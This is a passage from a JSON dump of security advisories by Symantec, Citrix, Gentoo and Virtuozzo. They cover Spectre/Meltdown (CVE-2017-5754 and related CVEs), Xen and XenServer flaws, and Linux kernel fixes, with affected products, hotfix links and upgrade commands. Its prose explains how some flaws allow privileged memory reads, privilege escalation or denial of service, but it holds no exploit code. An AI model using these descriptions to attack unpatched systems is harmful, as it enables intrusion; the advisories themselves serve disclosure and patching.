Manager 3.0 \n * VMWare Workstation 12.0 \n * VMWare Workstation 12.5.3 \n * VMWare Workstation 12.5.5 \n * VMWare Workstation 12.5.7 \n * VMWare vCenter Server 6.0 \n * VMWare vCenter Server 6.5 \n * VMWare vCloud Usage Meter 3.0 \n * VMWare vCloud Usage Meter 3.3 \n * VMWare vCloud Usage Meter 3.3.3 \n * VMWare vRealize Automation 6.0 \n * VMWare vRealize Automation 6.1 \n * VMWare vRealize Automation 6.2 \n * VMWare vRealize Automation 6.2.4 \n * VMWare vRealize Automation 6.2.4.1 \n * VMWare vRealize Automation 6.2.5 \n * VMWare vRealize Automation 7.0 \n * VMWare vRealize Automation 7.1 \n * VMWare vRealize Automation 7.2.0 \n * VMWare vRealize Automation 7.3.0 \n * VMWare vSphere Data Protection 6.0 \n * VMWare vSphere Data Protection 6.0.0 \n * VMWare vSphere Data Protection 6.0.5 \n * VMWare vSphere Data Protection 6.0.6 \n * VMWare vSphere Data Protection 6.0.7 \n * VMWare vSphere Data Protection 6.1 \n * VMWare vSphere Data Protection 6.1.0 \n * VMWare vSphere Data Protection 6.1.4 \n * VMWare vSphere Data Protection 6.1.5 \n * VMWare vSphere Data Protection 6.1.6 \n * VMWare vSphere Integrated Containers 1.0 \n * VMWare vSphere Integrated Containers 1.1 \n * VMWare vSphere Integrated Containers 1.2 \n * VMWare vSphere Integrated Containers 1.3 \n * Xen Xen \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nGiven the local nature of this issue, grant only trusted and accountable individuals access to affected computers. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-01-03T00:00:00", "published": "2018-01-03T00:00:00", "id": "SMNTC-102378", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102378", "type": "symantec", "title": "Multiple CPU Hardware CVE-2017-5754 Information Disclosure Vulnerability", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "citrix": [{"lastseen": "2020-11-18T15:29:36", "bulletinFamily": "software", "cvelist": ["CVE-2017-5753", "CVE-2017-5754", "CVE-2017-5715"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<h2> Overview</h2>\n<div>\n<div>\n<div>\n<p>A new class of issues has been identified in common CPU architectures. The presently known issues could allow unprivileged code to read privileged memory locations.</p>\n<p>Citrix is analysing the potential impact of these issues across its product range. This bulletin will be updated as further information becomes available on the impacts of these issues and their variants.</p>\n<p>Please note that, although these are issues in the underlying processor hardware, Citrix intends to provide software updates, together with our partners, to mitigate these issues where practical.</p>\n<p>Please review the following sections for information on your specific Citrix products. This bulletin will be updated as more information becomes available. Customers can receive e-mail notifications about updated or new security bulletins by subscribing at the following address: <a href=\"https://support.citrix.com/user/alerts\">https://support.citrix.com/user/alerts</a> </p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Products that we believe are not impacted:</h2>\n<div>\n<div>\n<div>\n<ul>\n<li>Citrix XenMobile Server: Citrix believes that currently supported versions of Citrix XenMobile Server are not impacted by the presently known variants of these issues.</li>\n<li>Citrix XenMobile MDX Toolkit and SDK: Citrix believes that currently supported versions of Citrix XenMobile MDX Toolkit and SDK are not impacted by the presently known variants of these issues.<br/> </li>\n<li>Citrix NetScaler (MPX/VPX): Citrix believes that currently supported versions of Citrix NetScaler MPX and VPX are not impacted by the presently known variants of these issues.</li>\n<li>Citrix NetScaler AppFirewall Platforms: Citrix believes that currently supported versions of Citrix NetScaler AppFirewall Platforms are not impacted by the presently known variants of these issues.<br/> </li>\n<li>Citrix NetScaler Management Analytics Service (MAS): Citrix believes that currently supported versions of the Citrix NetScaler Management Analytics Service are not impacted by presently known variants of these issues.</li>\n<li>Citrix Command Center: Citrix believes that currently supported versions of the Citrix Command Center, both hardware and software components, are not impacted by presently known variants of these issues.</li>\n<li>Citrix NetScaler Insight Center: Citrix believes that currently supported versions of Citrix NetScaler Insight Center are not impacted by the presently known variants of these issues.<br/> </li>\n<li>Citrix NetScaler SD-WAN (Standard. Enterprise, WAN Optimization (except 1000WS/2000WS platform) editions) / SD-WAN Center: Citrix believes that currently supported versions of Citrix NetScaler SD-WAN are not impacted by the presently known variants of these issues.</li>\n<li>Citrix ShareFile StorageZones Controller: Citrix believes that currently supported versions of Citrix ShareFile StorageZones Controller are not impacted by the presently known variants of these issues.</li>\n<li>Citrix License Server: Citrix believes that currently supported versions of Citrix License Server are not impacted by the presently known variants of these issues.<br/> </li>\n<li>Citrix StoreFront: Citrix believes that currently supported versions of Citrix StoreFront are not impacted by the presently known variants of these issues.<br/> </li>\n<li>Citrix App Orchestration: Citrix believes that currently supported versions of Citrix App Orchestration are not impacted by the presently known variants of these issues.<br/> </li>\n<li>Citrix App Layering: Citrix believes that currently supported versions of Citrix App Layering are not impacted by the presently known variants of these issues.<br/> </li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Products that may require Third Party updates:</h2>\n<div>\n<div>\n<div>\n<ul>\n<li>Citrix XenApp/XenDesktop: Citrix believes that currently supported versions of the core Citrix XenApp and XenDesktop products are not impacted by presently known variants of these issues. However, it is probable that the underlying operating system, drivers and CPU firmware will require updating. Citrix strongly recommends that customers contact their operating system and hardware vendors for information on how to obtain these updates.</li>\n<li>Citrix Provisioning Services: Citrix believes that currently supported versions of Citrix Provisioning Services products are not impacted by presently known variants of these issues. However, it is probable that the underlying operating system, drivers and CPU firmware will require updating. Citrix strongly recommends that customers contact their operating system and hardware vendors for information on how to obtain these updates.</li>\n<li>Citrix AppDNA: Citrix believes that currently supported versions of Citrix AppDNA are not impacted by presently known variants of these issues. However, it is probable that the underlying operating system, drivers and CPU firmware will require updating. Citrix strongly recommends that customers contact their operating system and hardware vendors for information on how to obtain these updates.</li>\n<li>Citrix Linux VDA: Citrix believes that currently supported versions of Citrix Linux VDA are not impacted by presently known variants of these issues. However, it is probable that the underlying operating system, drivers and CPU firmware will require updating. Citrix strongly recommends that customers contact their operating system and hardware vendors for information on how to obtain these updates.</li>\n<li>Citrix XenMobile Apps: Citrix believes that currently supported versions of Citrix XenMobile Apps are not impacted by presently known variants of these issues. However, it is probable that the underlying operating system, drivers and CPU firmware will require updating. Citrix strongly recommends that customers contact their operating system and hardware vendors for information on how to obtain these updates.</li>\n<li>Citrix ShareFile Clients on Desktop and Mobile: Citrix believes that currently supported versions Citrix ShareFile Clients are not impacted by presently known variants of these issues. However, it is probable that the underlying operating system, drivers and CPU firmware will require updating. Citrix strongly recommends that customers contact their operating system and hardware vendors for information on how to obtain these updates.</li>\n<li>Citrix Receivers for Desktop and Mobile: Citrix believes that currently supported versions of Citrix Receivers are not impacted by presently known variants of these issues. However, it is probable that the underlying operating system, drivers and CPU firmware will require updating. Citrix strongly recommends that customers contact their operating system and hardware vendors for information on how to obtain these updates.</li>\n<li>ByteMobile products: When deployed in line with Citrix recommendations, Citrix believes that currently supported versions of ByteMobile products are not impacted by the presently known variants of these issues. However, Citrix strongly recommends that customers using virtualized installations of ByteMobile products contact their Citrix ByteMobile Telco Support contact for potential mitigations steps and further information.</li>\n</ul>\n<p> </p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Products that we believe are impacted:</h2>\n<div>\n<div>\n<div>\n<ul>\n<li>Citrix NetScaler SDX: Citrix believes that currently supported versions of Citrix NetScaler SDX are not at risk from malicious network traffic. However, in light of these issues, Citrix strongly recommends that customers only deploy NetScaler instances on Citrix NetScaler SDX where the NetScaler admins are trusted.</li>\n<li>Citrix NetScaler SD-WAN (WANOpt1000WS/2000WS): When deployed in environments with only trusted administrators, Citrix believes that currently supported WAN Optimization versions of Citrix SD-WAN on 1000WS/2000WS platforms are not at risk from malicious network traffic. Citrix strongly recommends that Citrix SD-WAN 1000WS and 2000WS administrators ensure that access to the Citrix supplied Windows VM is limited to trusted administrators only</li>\n<li>Citrix XenServer: Please see <a href=\"https://support.citrix.com/article/ctx231390\">https://support.citrix.com/article/ctx231390</a> for information on Citrix XenServer</li>\n</ul>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Citrix Is Doing</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Obtaining Support on This Issue</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Reporting Security Vulnerabilities</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Changelog</h2>\n<div>\n<div>\n<div>\n<table width=\"100%\">\n<tbody>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">Date </td>\n<td colspan=\"1\" rowspan=\"1\">Change</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">3rd January 2018 </td>\n<td colspan=\"1\" rowspan=\"1\">Initial publishing</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">3rd January 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Updated immediately after embargo expiry</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">4th January 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Updated to include XenServer</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">5th January 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Expanded product coverage</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">9th January 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Updated product coverage</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">11th January 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Added information for ByteMobile products</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">14th January 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Added information for NetScaler SD-WAN</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">1st February 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Added information for NetScaler MAS and Command Center</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">6th February 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Updated naming for XenMobile client components</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\n</div></div>\n</section>", "edition": 2, "modified": "2018-02-06T04:00:00", "published": "2018-01-03T04:00:00", "id": "CTX231399", "href": "https://support.citrix.com/article/CTX231399", "title": "Citrix Security Updates for CVE-2017-5715, CVE-2017-5753, CVE-2017-5754", "type": "citrix", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-12-24T11:42:53", "bulletinFamily": "software", "cvelist": ["CVE-2016-2074", "CVE-2018-7540", "CVE-2018-7541"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"DescriptionofProblem\"> Description of Problem</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>A number of vulnerabilities have been identified within Citrix XenServer that could, if exploited, allow a malicious administrator of a guest VM to crash the host and, for some XenServer versions, allow a remote attacker to compromise the host.</p>\n<p>The following vulnerabilities have been addressed:</p>\n<ul>\n<li>CVE-2016-2074: openvswitch: MPLS buffer overflow vulnerability</li>\n<li>CVE-2018-7540: DoS via non-preemptable L3/L4 pagetable freeing</li>\n<li>CVE-2018-7541: grant table v2 -&gt; v1 transition may crash Xen</li>\n</ul>\n<p>The host compromise issue (CVE-2016-2074) affects Citrix XenServer versions 7.0 and 7.1 CU1 only.<br/> The denial of service issues affect all supported versions of Citrix XenServer prior to version 7.4.<br/> </p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"MitigatingFactors\"> Mitigating Factors</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Customers using the \u201cLinux bridge\u201d networking mode are unaffected by the host compromise issue.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCustomersShouldDo\"> What Customers Should Do</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Hotfixes have been released to address these issues. Citrix strongly recommends that affected customers install these hotfixes as soon as possible. The hotfixes can be downloaded from the following locations:</p>\n<p>Citrix XenServer 7.3: CTX233368 \u2013 <a href=\"https://support.citrix.com/article/CTX233368\">https://support.citrix.com/article/CTX233368</a></p>\n<p>Citrix XenServer 7.2: CTX233366 \u2013 <a href=\"https://support.citrix.com/article/CTX233366\">https://support.citrix.com/article/CTX233366</a></p>\n<p>Citrix XenServer 7.1 LTSR CU1: CTX233363 \u2013 <a href=\"https://support.citrix.com/article/CTX233363\">https://support.citrix.com/article/CTX233363</a> and CTX233365 \u2013 <a href=\"https://support.citrix.com/article/CTX233365\">https://support.citrix.com/article/CTX233365</a></p>\n<p>Citrix XenServer 7.0: CTX233362 \u2013 <a href=\"https://support.citrix.com/article/CTX233362\">https://support.citrix.com/article/CTX233362</a> and CTX233364 \u2013 <a href=\"https://support.citrix.com/article/CTX233364\">https://support.citrix.com/article/CTX233364</a></p>\n<p>These hotfixes are not livepatchable.</p>\n<p>Citrix is actively working on remediating the denial of service issues for releases that are End of Maintenance but not yet End of Life.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCitrixIsDoing\"> What Citrix Is Doing</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ObtainingSupportonThisIssue\"> Obtaining Support on This Issue</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ReportingSecurityVulnerabilities\"> Reporting Security Vulnerabilities</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"Changelog\"> Changelog</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<table border=\"1\" cellpadding=\"1\" cellspacing=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td>Date </td>\n<td>Change</td>\n</tr>\n<tr>\n<td>21st March 2018</td>\n<td>Initial publication</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n</div></div>\n</section>", "modified": "2018-03-21T04:00:00", "published": "2018-03-21T04:00:00", "id": "CTX232655", "href": "https://support.citrix.com/article/CTX232655", "type": "citrix", "title": "Citrix XenServer Multiple Security Updates", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T11:42:53", "bulletinFamily": "software", "cvelist": ["CVE-2017-5754", "CVE-2018-10892", "CVE-2018-10982", "CVE-2018-8897"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"DescriptionofProblem\"> Description of Problem</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>A number of security vulnerabilities have been identified in Citrix XenServer that may allow malicious code running in a PV guest VM to compromise the host and malicious privileged code running in an HVM guest VM to crash the host.</p>\n<p>These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including Citrix XenServer 7.4.</p>\n<p>The following vulnerabilities have been addressed:</p>\n<p>CVE-2017-5754: (High) Rogue data cache load, memory access permission check performed after kernel memory read</p>\n<p>CVE-2018-10982: (Medium) x86: vHPET interrupt injection errors</p>\n<p>CVE-2018-8897: (High) x86: mishandling of debug exceptions</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"MitigatingFactors\"> Mitigating Factors</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Customers with only HVM guest VMs with no untrustworthy privileged code running have mitigated these issues. Note that all Windows VMs are HVM guest VMs.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCustomersShouldDo\"> What Customers Should Do</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Hotfixes have been released to address these issues. Citrix strongly recommends that affected customers install these hotfixes as soon as possible. The hotfixes can be downloaded from the following locations:</p>\n<p>Citrix XenServer 7.4: CTX234440 \u2013 <a href=\"https://support.citrix.com/article/CTX234440\">https://support.citrix.com/article/CTX234440</a> </p>\n<p>Citrix XenServer 7.3: CTX234439 \u2013 <a href=\"https://support.citrix.com/article/CTX234439\">https://support.citrix.com/article/CTX234439</a> </p>\n<p>Citrix XenServer 7.1 LTSR CU1: CTX234437 \u2013 <a href=\"https://support.citrix.com/article/CTX234437\">https://support.citrix.com/article/CTX234437</a> </p>\n<p>Citrix XenServer 7.0: CTX234436 \u2013 <a href=\"https://support.citrix.com/article/CTX234436\">https://support.citrix.com/article/CTX234436</a> </p>\n<p>Citrix XenServer 6.5 SP1: CTX234435 \u2013 <a href=\"https://support.citrix.com/article/CTX234435\">https://support.citrix.com/article/CTX234435</a> </p>\n<p>Citrix XenServer 6.2 SP1: CTX234434 \u2013 <a href=\"https://support.citrix.com/article/CTX234434\">https://support.citrix.com/article/CTX234434</a> </p>\n<p>Citrix XenServer 6.0.2 Common Criteria: CTX234433 \u2013 <a href=\"https://support.citrix.com/article/CTX234433\">https://support.citrix.com/article/CTX234433</a> </p>\n<p>In addition, following the publication of CVE-2017-5754, Citrix committed to provide mitigations for this issue for the Citrix XenServer 7.2 release which is now End of Life. A hotfix for this release is available at Citrix XenServer 7.2: CTX234438 \u2013 <a href=\"https://support.citrix.com/article/CTX234438\">https://support.citrix.com/article/CTX234438</a> </p>\n<p>Note that, in line with previous statements, the hotfixes for the 6.x versions of Citrix XenServer do not include mitigations for CVE-2017-5754.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCitrixIsDoing\"> What Citrix Is Doing</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ObtainingSupportonThisIssue\"> Obtaining Support on This Issue</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ReportingSecurityVulnerabilities\"> Reporting Security Vulnerabilities</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"Changelog\"> Changelog</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<table border=\"1\" cellpadding=\"1\" cellspacing=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td>Date </td>\n<td>Change</td>\n</tr>\n<tr>\n<td>8th May 2018</td>\n<td>Initial Publication</td>\n</tr>\n<tr>\n<td>11th May 2018</td>\n<td>Updated missing CVE identifier CVE-2018-10892</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n</div></div>\n</section>", "modified": "2018-05-11T04:00:00", "published": "2018-05-08T04:00:00", "id": "CTX234679", "href": "https://support.citrix.com/article/CTX234679", "type": "citrix", "title": "Citrix XenServer Multiple Security Updates", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2018-10-31T00:03:19", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5753", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-15468", "CVE-2018-10981", "CVE-2018-7542", "CVE-2018-12892", "CVE-2018-15470", "CVE-2018-3646", "CVE-2017-5715", "CVE-2018-12893", "CVE-2018-3620", "CVE-2018-7541", "CVE-2018-15469", "CVE-2018-10982", "CVE-2018-5244", "CVE-2018-12891"], "description": "### Background\n\nXen is a bare-metal hypervisor.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Xen. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA local attacker could cause a Denial of Service condition or disclose sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Xen users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/xen-4.10.1-r2\"", "edition": 1, "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "GLSA-201810-06", "href": "https://security.gentoo.org/glsa/201810-06", "title": "Xen: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5754", "CVE-2017-17450", "CVE-2018-6927", "CVE-2017-13166", "CVE-2018-1130", "CVE-2017-1000410", "CVE-2018-5754", "CVE-2018-8897", "CVE-2017-17807"], "description": "This update provides a new Virtuozzo 6.0 kernel 2.6.32-042stab129.1 that is a rebase to the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.28.1.el6. The new kernel inherits a number of security fixes from RHEL and also introduces internal security and stability fixes.\n**Vulnerability id:** CVE-2017-5754\nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instruction permission faults, exception generation triggered by a faulting access is suppressed until the retirement of the whole instruction block. In a combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. NOTE: This update fixes the 32-bit compatibility layer on x86-64 processors, i.e. when 32-bit containers are executed on 64-bit processors.\n\n**Vulnerability id:** CVE-2017-13166\nA bug in the 32-bit compatibility layer of the ioctl handling code of the v4l2 video driver in the Linux kernel has been found. A memory protection mechanism ensuring that user-provided buffers always point to a userspace memory were disabled, allowing destination address to be in a kernel space. This flaw could be exploited by an attacker to overwrite a kernel memory from an unprivileged userspace process, leading to privilege escalation.\n\n**Vulnerability id:** CVE-2017-17807\nThe KEYS subsystem in the Linux kernel omitted an access-control check when writing a key to the current task's default keyring, allowing a local user to bypass security checks to the keyring. This compromises the validity of the keyring for those who rely on it.\n\n**Vulnerability id:** CVE-2017-1000410\nA flaw was found in the processing of incoming L2CAP bluetooth commands. Uninitialized stack variables can be sent to an attacker leaking data in kernel address space.\n\n**Vulnerability id:** CVE-2018-1130\nLinux kernel before version 4.16-rc7 is vulnerable to a null pointer dereference in dccp_write_xmit() function in net/dccp/output.c in that allows a local user to cause a denial of service by a number of certain crafted system calls.\n\n**Vulnerability id:** CVE-2018-8897\nA flaw was found in the way the Linux kernel handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, the processor did not deliver interrupts and exceptions, rather they are delivered once the first instruction after the stack switch is executed. An unprivileged system user could use this flaw to crash the system kernel resulting in the denial of service.\n\n**Vulnerability id:** CVE-2017-17450\nnet/netfilter/xt_osf.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for add_callback and remove_callback operations. This allows local users to bypass intended access restrictions because the xt_osf_fingers data structure is shared across all network namespaces.\n\n**Vulnerability id:** CVE-2018-6927\nThe futex_requeue function in kernel/futex.c in the Linux kernel, before 4.14.15, might allow attackers to cause a denial of service (integer overflow) or possibly have unspecified other impacts by triggering a negative wake or requeue value.\n\n", "edition": 1, "modified": "2018-05-14T00:00:00", "published": "2018-05-14T00:00:00", "id": "VZA-2018-029", "href": "https://help.virtuozzo.com/customer/portal/articles/2939247", "title": "Kernel security update: CVE-2017-5754 and other; new kernel 2.6.32-042stab129.1, Virtuozzo 6.0 Update 12 Hotfix 23 (6.0.12-3703)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5754", "CVE-2017-17450", "CVE-2018-6927", "CVE-2017-13166", "CVE-2018-1130", "CVE-2017-1000410", "CVE-2018-5754", "CVE-2018-8897", "CVE-2017-17807"], "description": "This update provides a new Virtuozzo Containers for Linux 4.7 and Server Bare Metal 5.0 kernel 2.6.32-042stab129.1 that is a rebase to the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.28.1.el6. The new kernel inherits a number of security fixes from RHEL and also introduces internal security and stability fixes.\n**Vulnerability id:** CVE-2017-5754\nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instruction permission faults, exception generation triggered by a faulting access is suppressed until the retirement of the whole instruction block. In a combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. NOTE: This update fixes the 32-bit compatibility layer on x86-64 processors, i.e. when 32-bit containers are executed on 64-bit processors.\n\n**Vulnerability id:** CVE-2017-13166\nA bug in the 32-bit compatibility layer of the ioctl handling code of the v4l2 video driver in the Linux kernel has been found. A memory protection mechanism ensuring that user-provided buffers always point to a userspace memory were disabled, allowing destination address to be in a kernel space. This flaw could be exploited by an attacker to overwrite a kernel memory from an unprivileged userspace process, leading to privilege escalation.\n\n**Vulnerability id:** CVE-2017-17807\nThe KEYS subsystem in the Linux kernel omitted an access-control check when writing a key to the current task's default keyring, allowing a local user to bypass security checks to the keyring. This compromises the validity of the keyring for those who rely on it.\n\n**Vulnerability id:** CVE-2017-1000410\nA flaw was found in the processing of incoming L2CAP bluetooth commands. Uninitialized stack variables can be sent to an attacker leaking data in kernel address space.\n\n**Vulnerability id:** CVE-2018-1130\nLinux kernel before version 4.16-rc7 is vulnerable to a null pointer dereference in dccp_write_xmit() function in net/dccp/output.c in that allows a local user to cause a denial of service by a number of certain crafted system calls.\n\n**Vulnerability id:** CVE-2018-8897\nA flaw was found in the way the Linux kernel handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, the processor did not deliver interrupts and exceptions, rather they are delivered once the first instruction after the stack switch is executed. An unprivileged system user could use this flaw to crash the system kernel resulting in the denial of service.\n\n**Vulnerability id:** CVE-2017-17450\nnet/netfilter/xt_osf.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for add_callback and remove_callback operations. This allows local users to bypass intended access restrictions because the xt_osf_fingers data structure is shared across all network namespaces.\n\n**Vulnerability id:** CVE-2018-6927\nThe futex_requeue function in kernel/futex.c in the 